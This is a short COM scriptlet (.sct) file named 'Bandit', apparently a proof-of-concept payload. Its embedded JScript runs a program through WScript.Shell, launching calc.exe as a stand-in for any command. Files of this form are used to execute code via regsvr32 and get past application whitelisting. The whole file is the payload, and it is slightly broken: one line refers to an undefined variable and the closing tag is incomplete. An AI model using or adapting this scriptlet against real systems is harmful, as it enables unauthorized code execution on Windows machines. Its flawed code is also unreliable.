<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{33453267-6633-8855-3478-6633FEEEECDC}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[
	var rrr = "AAA"
	var aa = rr
	var rrrrrrrrr = new ActiveXObject("WScript.Shell").Run("calc.exe");
	
	
]]>
</script>

</scriptlet
